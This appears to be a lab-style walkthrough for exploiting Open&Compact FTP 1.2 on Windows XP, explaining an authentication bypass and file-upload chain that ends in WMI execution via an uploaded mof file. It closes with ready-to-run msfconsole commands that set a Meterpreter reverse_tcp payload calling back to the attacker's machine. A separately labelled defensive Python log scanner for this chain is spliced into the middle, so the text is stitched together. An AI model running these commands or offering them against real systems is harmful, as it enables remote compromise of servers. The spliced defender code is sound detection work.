This module exploits multiple vulnerabilities found in Open&Compact FTP server. The software contains an authentication bypass vulnerability and an arbitrary file upload vulnerability that allows a remote attacker to write arbitrary files to the file system as long as there is at least one user who has permission. Code execution can be achieved by first uploading the payload to the remote machine as an exe file, and then uploading a mof file, which causes WMI (the Windows Management Instrumentation service) to execute the uploaded payload. Please note that this module currently only works for Windows versions before Vista.
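A defender's view of the chain described above, as an added example that is not part of the original post or of the Metasploit module: a Python pass over FTP command logs that flags uploads made without a successful login, and an exe upload followed by a mof upload in the same session. The log format, session ids and file names are constructed, and treating the bypass as "STOR with no prior 230 reply" is an assumption.

```python
import re
from collections import defaultdict

# Constructed sample log (hypothetical format: "<session> <C|S> <FTP line>").
SAMPLE_LOG = """\
s1 C USER alice
s1 S 331 Password required
s1 C PASS secret
s1 S 230 User logged in
s1 C STOR notes.txt
s2 C STOR update.exe
s2 C STOR task.mof
s3 C USER bob
s3 C PASS wrong
s3 S 530 Login incorrect
s3 C STOR readme.txt
"""

LINE = re.compile(r"^(\S+) ([CS]) (.*)$")

def analyze(log_text):
    """Return {session: sorted list of findings} for suspicious sessions."""
    authed = set()                 # sessions that received a 230 reply
    uploads = defaultdict(list)    # session -> extensions uploaded so far
    findings = defaultdict(set)
    for raw in log_text.splitlines():
        m = LINE.match(raw.strip())
        if not m:
            continue
        sid, side, text = m.groups()
        if side == "S":
            if text.startswith("230"):   # 230 = user logged in (RFC 959)
                authed.add(sid)
            continue
        verb, _, arg = text.partition(" ")
        if verb.upper() != "STOR":
            continue
        if sid not in authed:            # assumption: bypass shows up like this
            findings[sid].add("upload-before-login")
        ext = arg.rsplit(".", 1)[-1].lower() if "." in arg else ""
        uploads[sid].append(ext)
        if ext == "mof" and "exe" in uploads[sid]:   # exe, then mof
            findings[sid].add("exe-then-mof")
    return {sid: sorted(f) for sid, f in findings.items()}

if __name__ == "__main__":
    for sid, found in analyze(SAMPLE_LOG).items():
        print(sid, ", ".join(found))
```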
Exploit Targets
Open&Compact FTP 1.2
Requirement
Attacker: Kali Linux
Victim PC: Windows XP SP 3
Open a Kali Linux terminal and type msfconsole
Now type use exploit/windows/ftp/open_ftpd_wbem
msf exploit (open_ftpd_wbem)>set payload windows/meterpreter/reverse_tcp
msf exploit (open_ftpd_wbem)>set lhost 192.168.1.137 (IP of Local Host)
msf exploit (open_ftpd_wbem)>set rhost 192.168.1.129 (IP of Victim PC)
msf exploit (open_ftpd_wbem)>exploit